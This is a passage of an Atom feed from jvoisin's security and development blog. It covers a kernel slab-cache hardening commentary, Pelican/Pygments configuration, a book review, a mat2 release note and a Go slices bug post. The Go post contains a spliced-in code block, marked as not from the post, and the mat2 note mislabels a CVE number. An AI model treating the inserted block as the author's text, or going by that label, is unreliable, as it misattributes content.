<li>Add <code>sp.log_max_len</code> to limit the maximum size of the log messages</li>
<li>Add an example configuration for Xenforo 2.2.12 </li>
<li>URL-encode function arguments when logging them</li>
<li>Fix a possible NULL-byte truncation when outputting parameters in the logs</li>
<li>Make <code>readonly_exec</code> play nice on readonly filesystems </li>
</ul>
<p>As usual, if you want to help, we have some
<a href="https://github.com/jvoisin/snuffleupagus/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22">low hanging fruits</a> ♥</p>
<p>See you in your PHP stack!</p></content><category term="php"></category></entry><entry><title>Some notes on "Randomized slab caches for kmalloc()"</title><link href="https://dustri.org/b/some-notes-on-randomized-slab-caches-for-kmalloc.html" rel="alternate"></link><published>2023-09-11T01:45:00+02:00</published><updated>2023-09-11T01:45:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-09-11:/b/some-notes-on-randomized-slab-caches-for-kmalloc.html</id><summary type="html"><p>Ruiqi Gong and Xiu Jianfeng got their
<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c6152940584290668b35fa0800026f6a1ae05fe">Randomized slab caches for kmalloc()</a>
patch series merged upstream, and I've had enough discussions about it to
warrant summarising them into a small blogpost.</p>
<p>The main idea is to have multiple slab caches, and pick one at random based on
the address of …</p></summary><content type="html"><p>Ruiqi Gong and Xiu Jianfeng got their
<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c6152940584290668b35fa0800026f6a1ae05fe">Randomized slab caches for kmalloc()</a>
patch series merged upstream, and I've had enough discussions about it to
warrant summarising them into a small blogpost.</p>
<p>The main idea is to have multiple slab caches, and pick one at random based on
the address of code calling <code>kmalloc()</code> and a per-boot seed, to make heap-spraying harder.
It's a great idea, but comes with some shortcomings for now:</p>
<ul>
<li>Objects being allocated via wrappers around <code>kmalloc()</code>, like <code>sock_kmalloc</code>,
<code>f2fs_kmalloc</code>, <code>aligned_kmalloc</code>, … will end up in the same slab cache.</li>
<li>The slabs need to be pinned, otherwise an attacker could <a href="https://en.wikipedia.org/wiki/Heap_feng_shui">feng-shui</a> their way
into having the whole slab freed, garbage-collected, and have a slab for
another type allocated at the same VA. <a href="https://thejh.net/">Jann Horn</a> and <a href="https://infosec.exchange/@nspace">Matteo Rizzo</a> have a <a href="https://github.com/torvalds/linux/compare/master...thejh:linux:slub-virtual-upstream">nice
set of patches</a>,
discussed a bit in <a href="https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html">this Project Zero blogpost</a>,
for a feature called <a href="https://github.com/torvalds/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e"><code>SLAB_VIRTUAL</code></a>,
implementing precisely this.</li>
<li>There are 16 slabs by default, so one chance out of 16 to end up in the same
slab cache as the target.</li>
<li>There are no guard pages between caches, so inter-caches overflows are
possible.</li>
<li>As pointed out by <a href="https://twitter.com/andreyknvl/status/1700267669336080678">andreyknvl</a>
and <a href="https://infosec.exchange/@minipli/111045336853055793">minipli</a>,
fewer allocations hitting a given cache mean less noise,
so it might even help with some heap feng-shui.</li>
<li>minipli also pointed out that "randomized caches still freely
mix kernel allocations with user controlled ones (<code>xattr</code>, <code>keyctl</code>, <code>msg_msg</code>, …).
So even though merging is disabled for these caches, i.e. no direct overlap
with <code>cred_jar</code> etc., other object types can still be targeted (<code>struct
pipe_buffer</code>, BPF maps, its verifier state objects,…). It’s just a matter of
probing which allocation index the targeted object falls into.",
but I considered this out of scope, since it's much more involved;
albeit something like Jann Horn's <a href="https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README"><code>CONFIG_KMALLOC_SPLIT_VARSIZE</code></a>
wouldn't significantly increase complexity.</li>
</ul>
<p>Also, while code addresses as a source of entropy have historically been a great
way to provide <a href="https://lwn.net/Articles/569635/">KASLR</a> bypasses, <code>hash_64(caller ^
random_kmalloc_seed, ilog2(RANDOM_KMALLOC_CACHES_NR + 1))</code> shouldn't trivially
leak offsets.</p>
<p>The segregation technique is a bit like a weaker version of grsecurity's
<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">AUTOSLAB</a>,
or a weaker kernel-land version of
<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>,
but to be fair, making use-after-free exploitation harder, and significantly
harder once pinning lands, with only ~150 lines of code and negligible
performance impact is amazing and should be praised. Moreover, I wouldn't be
surprised if this was backported in <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's KernelCTF</a>
soon, so we should see if my analysis is correct.</p></content><category term="security"></category></entry><entry><title>Making use of pygments' filters with Pelican</title><link href="https://dustri.org/b/making-use-of-pygments-filters-with-pelican.html" rel="alternate"></link><published>2023-09-01T18:30:00+02:00</published><updated>2023-09-01T18:30:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-09-01:/b/making-use-of-pygments-filters-with-pelican.html</id><summary type="html"><p>I've been using <a href="https://github.com/getpelican/pelican">Pelican</a>
more or less since the beginning of this blog and I'm still
pretty happy about it. Mostly because of how <a href="https://boringtechnology.club">boring</a>
it is, and its complete absence of fundamental changes throughout the years.</p>
<p>Anyway, I was looking at how to reduce the size of the pages …</p></summary><content type="html"><p>I've been using <a href="https://github.com/getpelican/pelican">Pelican</a>
more or less since the beginning of this blog and I'm still
pretty happy about it. Mostly because of how <a href="https://boringtechnology.club">boring</a>
it is, and its complete absence of fundamental changes throughout the years.</p>
<p>Anyway, I was looking at how to reduce the size of the pages of my blog
and looked at how code is syntactically highlighted:
Pelican is using <a href="https://pygments.org">Pygments</a> to do this,
and looking at its documentation, the <a href="https://pygments.org/docs/filters/#TokenMergeFilter">TokenMergeFilter</a>
should help a bit, by merging tokens of the same type together,
instead of highlighting them separately.</p>
<p>Pelican's documentation <a href="https://docs.getpelican.com/en/stable/settings.html">says</a>
that options can be passed to python-markdown like this:
<code>MARKDOWN = { 'extension_configs': { 'markdown.extensions.codehilite': {'css_class': 'highlight'} } }</code>.</p>
<p>Looking at <a href="https://python-markdown.github.io/">python-markdown</a>'s <a href="https://python-markdown.github.io/reference/#markdown">one</a>,
one can pass various things as parameters, but it doesn't mention filters.
<a href="https://pygments.org/docs/filters/">Pygments documentation on this topic</a> implies
that the only way to add filters is to use the <code>add_filter</code> method on a lexer.</p>
<p>But <a href="https://github.com/pygments/pygments/blob/master/pygments/lexer.py">looking at the code</a>
as suggested <a href="https://github.com/Python-Markdown/markdown/issues/1322#issuecomment-1453911760">here</a>,
filters can be passed like any other options, meaning that one only needs to
add the following code into the <code>pelicanconf.py</code> file to use the
<code>TokenMergeFilter</code>:</p>
<div class="codehilite"><pre><span></span><code><span class="c1"># TokenMergeFilter lives in pygments, not in pelican</span>
<span class="kn">from</span> <span class="nn">pygments.filters</span> <span class="kn">import</span> <span class="n">TokenMergeFilter</span>
<span class="n">MARKDOWN</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s1">&#39;extension_configs&#39;</span><span class="p">:</span> <span class="p">{</span>
        <span class="s1">&#39;markdown.extensions.codehilite&#39;</span><span class="p">:</span> <span class="p">{</span>
            <span class="c1"># filters are forwarded to the lexer like any other option</span>
            <span class="s1">&#39;filters&#39;</span><span class="p">:</span> <span class="p">[</span><span class="n">TokenMergeFilter</span><span class="p">()]</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>Totally worth the effort for a marginal page size reduction!</p></content><category term="web"></category></entry><entry><title>Book review: Hacks, Leaks, and Revelations</title><link href="https://dustri.org/b/book-review-hacks-leaks-and-revelations.html" rel="alternate"></link><published>2023-08-16T16:15:00+02:00</published><updated>2023-08-16T16:15:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-08-16:/b/book-review-hacks-leaks-and-revelations.html</id><summary type="html"><p><a href="https://nostarch.com/hacks-leaks-and-revelations"><img alt="Hacks, Leaks, and Revelations cover" src="https://dustri.org/b/images/HacksLeaksReveleations.png"></a></p>
<p>Last month, I got an email <a href="https://nostarch.com/about">from Briana Blackwell from No Starch Press</a>'s marketing department,
telling me that <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>
by <a href="https://micahflee.com/">Micah Lee</a>
was available in <em>early access</em>, and that they'd be happy to send me an ebook
copy …</p></summary><content type="html"><p><a href="https://nostarch.com/hacks-leaks-and-revelations"><img alt="Hacks, Leaks, and Revelations cover" src="https://dustri.org/b/images/HacksLeaksReveleations.png"></a></p>
<p>Last month, I got an email <a href="https://nostarch.com/about">from Briana Blackwell from No Starch Press</a>'s marketing department,
telling me that <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>
by <a href="https://micahflee.com/">Micah Lee</a>
was available in <em>early access</em>, and that they'd be happy to send me an ebook
copy free of charge!</p>
<p>From the couple of interactions I had with him, Lee is not only a great human being,
but also technically literate. He's the director of information security
at <a href="https://theintercept.com/staff/micah-lee/">The Intercept</a>, and the person
behind <a href="https://onionshare.org/">OnionShare</a> and <a href="https://dangerzone.rocks/">DangerZone</a>;
so I was thrilled to finally get my hands on his book!</p>
<p>And what a great one it is! It's a complete course for everyone who wants to learn how to properly deal with and report on large data sets like leaks:
How to communicate with sources along with some notions of <a href="https://en.wikipedia.org/wiki/Operations_security">opsec</a>,
some words on the ethics of dealing with this kind of data,
how to get data leaks and how to analyse them
properly and safely, wrangling tools like
<a href="https://github.com/freedomofpress/dangerzone">dangerzone</a>,
a <a href="https://en.wikipedia.org/wiki/BitTorrent">BitTorrent</a> client,
<a href="https://signal.org">Signal</a>,
<a href="https://torproject.org">Tor</a> via the <a href="https://www.torproject.org/download/">Tor Browser</a> and
<a href="https://onionshare.org/">Onionshare</a>,
some <a href="https://en.wikipedia.org/wiki/Linux">linux</a> and <a href="https://en.wikipedia.org/wiki/Shell_(computing)">shell</a> basics,
a crash course into data analysis with <a href="https://python.org">Python</a> and <a href="https://en.wikipedia.org/wiki/SQL">SQL</a>,
the <a href="https://occrp.org/en">OCCRP</a>'s <a href="https://docs.aleph.occrp.org/">Aleph</a>,
…
with hands-on exercises and reporting examples based on real leaks like
<a href="https://en.wikipedia.org/wiki/2021_Epik_data_breach">EpikFail</a>,
<a href="https://en.wikipedia.org/wiki/BlueLeaks">BlueLeaks</a>,
the <a href="https://apnews.com/article/oath-keepers-leaked-membership-rolls-2ca4195ed3a10e45dd189bf98f3e5a26">Oath Keepers leak</a>,
<a href="https://discordleaks.unicornriot.ninja/discord/">Unicorn Riot's DiscordLeaks</a>,
<a href="https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/">AFLDS</a>,
the <a href="https://www.databreaches.net/heritage-foundation-wasnt-attacked-they-leaked-their-own-data/">Heritage Foundation emails</a>,
…</p>
<p>It's a comprehensive yet highly digestible resource that I would wholeheartedly
recommend to anyone remotely interested in modern journalism practices. Hacked
and dumped databases are all around the internet, waiting to be analysed, reported on,
contextualised and exposed, and with this book, anyone could help with
the effort of making the world a better place: sunlight is the best
disinfectant!</p></content><category term="book_reviews"></category></entry><entry><title>mat2 0.13.4</title><link href="https://dustri.org/b/mat2-0134.html" rel="alternate"></link><published>2023-08-02T21:30:00+02:00</published><updated>2023-08-02T21:30:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-08-02:/b/mat2-0134.html</id><summary type="html"><p>There is a new minor version of mat2:
<a href="https://0xacab.org/jvoisin/mat2/tags/0.13.4">0.13.4</a>. No groundbreaking
changes, only minor improvements, code modernisation and a bit of hardening:</p>
<ul>
<li>Add documentation about mat2 on OSX</li>
<li>Make use of python3.7 constructs to simplify code</li>
<li>Use more modern type annotations</li>
<li>Harden <code>get_meta</code> in archive.py against …</li></ul></summary><content type="html"><p>There is a new minor version of mat2:
<a href="https://0xacab.org/jvoisin/mat2/tags/0.13.4">0.13.4</a>. No groundbreaking
changes, only minor improvements, code modernisation and a bit of hardening:</p>
<ul>
<li>Add documentation about mat2 on OSX</li>
<li>Make use of python3.7 constructs to simplify code</li>
<li>Use more modern type annotations</li>
<li>Harden <code>get_meta</code> in archive.py against variants of <a href="https://cve.circl.lu/cve/CVE-2022-35410">CVE-2021-35410</a></li>
<li>Improve MSOffice document support</li>
<li>Package the manpage on PyPI.</li>
</ul>
<p>Thanks to <a href="https://anelki.net/">akierig</a>, mat2 is now <a href="https://github.com/macports/macports-ports/pull/18072">available</a> in <a href="https://trac.macports.org/">macports</a>!</p>
<p>As usual, if you know some python, help is
<a href="https://0xacab.org/jvoisin/mat2/issues?label_name%5B%5D=good+first+issue">welcome</a>.</p></content><category term="metadata"></category></entry><entry><title>A sneaky Golang bug</title><link href="https://dustri.org/b/a-sneaky-golang-bug.html" rel="alternate"></link><published>2023-08-02T13:15:00+02:00</published><updated>2023-08-02T13:15:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-08-02:/b/a-sneaky-golang-bug.html</id><summary type="html"><p>Today at work, I needed a function in <a href="https://go.dev/">Go</a> to remove
duplicates from a slice, and thus wrote something like this using the
<a href="https://go.dev/doc/tutorial/generics">generic</a>-based
<a href="https://pkg.go.dev/golang.org/x/exp/slices">slices</a> package:</p>
<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">removeDuplicates</span><span class="p">(</span><span class="nx">s</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="p">)</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">SortFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="p">)</span>
<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">CompactFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">s</span>
<span class="p">}</span>
</code></pre></div>
<p>Can you spot the bug? Here are the …</p></summary><content type="html"><p>Today at work, I needed a function in <a href="https://go.dev/">Go</a> to remove
duplicates from a slice, and thus wrote something like this using the
<a href="https://go.dev/doc/tutorial/generics">generic</a>-based
<a href="https://pkg.go.dev/golang.org/x/exp/slices">slices</a> package:</p>
<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">removeDuplicates</span><span class="p">(</span><span class="nx">s</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="p">)</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">SortFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="p">)</span>
<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">CompactFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">s</span>
<span class="p">}</span>
</code></pre></div>
<p>Can you spot the bug? Here are the prototypes of the two functions:</p>
<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">SortFunc</span><span class="p">[</span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">x</span><span class="w"> </span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="w"> </span><span class="nx">b</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span>
<span class="kd">func</span><span class="w"> </span><span class="nx">CompactFunc</span><span class="p">[</span><span class="nx">S</span><span class="w"> </span><span class="o">~</span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">s</span><span class="w"> </span><span class="nx">S</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span><span class="w"> </span><span class="nx">S</span>
</code></pre></div>
<p>The first has no return value, while the second does, and it goes unused in our case: hence
the bug. It's <em>interesting</em> to note that the Go compiler is perfectly happy
with this and doesn't issue any warning: it was <em>extraordinarily fun</em> to pinpoint.</p>
<p>I reached out to <a href="https://airs.com/ian/">Ian Lance Taylor</a>, who
<a href="https://cs.opensource.google/go/x/exp/+/03df57b9a50843fbf23bf90375d6584bcc8ea13d">implemented</a>
those functions in 2021, and he pointed me to <a href="https://go.dev/blog/slices-intro">Go Slices: usage and internals</a>.
Things do indeed become obvious once you look at the
<a href="https://github.com/golang/go/blob/master/src/runtime/slice.go">implementation of
<code>slice</code></a>:</p>
<div class="codehilite"><pre><span></span><code><span class="kd">type</span><span class="w"> </span><span class="nx">slice</span><span class="w"> </span><span class="kd">struct</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">array</span><span class="w"> </span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span>
<span class="w"> </span><span class="nx">len</span><span class="w"> </span><span class="kt">int</span>
<span class="w"> </span><span class="nx">cap</span><span class="w"> </span><span class="kt">int</span>
<span class="p">}</span>
</code></pre></div>
<p>Both <code>slices.SortFunc</code> and <code>slices.CompactFunc</code> take a slice as a
parameter, and not a pointer to a slice: the callee gets a copy of the header (<code>array</code>,
<code>len</code>, <code>cap</code>). Both functions write through the shared backing array, so the
caller does see its elements reordered and the unique ones moved to the front, but any change
to <code>len</code> and <code>cap</code> is local to the callee's copy of the header. That is why
<code>CompactFunc</code> has to return a new, shorter slice, and why the caller has to keep it:
dropping the return value leaves the caller with the original length, duplicates included.</p>
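<p>The following is an added example, not code from the post: it puts the buggy
<code>removeDuplicates</code> next to the fixed one on constructed input and shows what the caller
actually gets back. It assumes <code>mytype</code> is a record keyed by an integer <code>ID</code>
(the post does not define it), and it uses the standard-library <code>slices</code> package of Go 1.21+
rather than <code>golang.org/x/exp/slices</code>, so <code>SortFunc</code> takes a three-way
<code>cmp</code> function returning <code>int</code> instead of the <code>less</code> function in the
prototypes above.</p>

```go
package main

import (
	"cmp"
	"fmt"
	"slices"
)

// mytype is an assumed stand-in for the post's element type: a record
// identified by an integer ID, so two records with the same ID are duplicates.
type mytype struct {
	ID   int
	Name string
}

// cmpByID is the ordering for slices.SortFunc. The Go 1.21 standard library
// takes a three-way comparison returning int; x/exp took less(a, b) bool.
func cmpByID(a, b mytype) int { return cmp.Compare(a.ID, b.ID) }

// eq is the equality used by slices.CompactFunc.
func eq(a, b mytype) bool { return a.ID == b.ID }

// removeDuplicatesBuggy reproduces the bug from the post: the slice returned
// by CompactFunc (same backing array, shorter len) is discarded, so the caller
// gets back a header with the original length.
func removeDuplicatesBuggy(s []mytype) []mytype {
	slices.SortFunc(s, cmpByID)
	slices.CompactFunc(s, eq) // return value dropped: compiles, no warning
	return s
}

// removeDuplicatesFixed keeps the header CompactFunc returns.
func removeDuplicatesFixed(s []mytype) []mytype {
	slices.SortFunc(s, cmpByID)
	return slices.CompactFunc(s, eq)
}

// sample returns constructed input: five records with three distinct IDs.
func sample() []mytype {
	return []mytype{{3, "c"}, {1, "a"}, {2, "b"}, {3, "c"}, {1, "a"}}
}

// ids projects a slice onto its IDs so results are easy to compare.
func ids(s []mytype) []int {
	out := make([]int, 0, len(s))
	for _, e := range s {
		out = append(out, e.ID)
	}
	return out
}

func main() {
	in := sample()

	// After the buggy call the elements are sorted and the unique ones sit at
	// the front (both functions wrote through the shared array), but the
	// returned header still has len 5, so the duplicates are only "gone" in
	// the prefix. What sits past that prefix is version dependent (stale
	// copies before Go 1.22, zero values from Go 1.22 on): never rely on it.
	arg := slices.Clone(in)
	buggy := removeDuplicatesBuggy(arg)
	fmt.Println("buggy:", ids(buggy), "len", len(buggy), "caller's len", len(arg))

	// The fixed version returns the shorter header. The caller's own variable
	// is still a 5-element header, which is exactly the point of the post.
	arg = slices.Clone(in)
	fixed := removeDuplicatesFixed(arg)
	fmt.Println("fixed:", ids(fixed), "len", len(fixed), "caller's len", len(arg))
}
```

<p>A unit test that checks <code>len</code> of the result against the number of distinct keys catches this
class of bug immediately; a test that only checks the first few elements does not, because the compacted
prefix looks correct in both versions.</p>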
<p>Anyway, there is a <a href="https://github.com/golang/go/issues/20803">proposal</a> to require
return values to be explicitly used or ignored, open since 2017, but it hasn't gone
anywhere so far. There is also <a href="https://github.com/golang/go/issues/20148">another proposal</a>
to make <code>go vet</code> better at highlighting error mishandling, as well as <a href="https://github.com/kisielk/errcheck">errcheck</a>,
but neither would really help in this case, since the dropped value is a slice, not an <code>error</code>.</p></content><category term="dev"></category></entry></feed>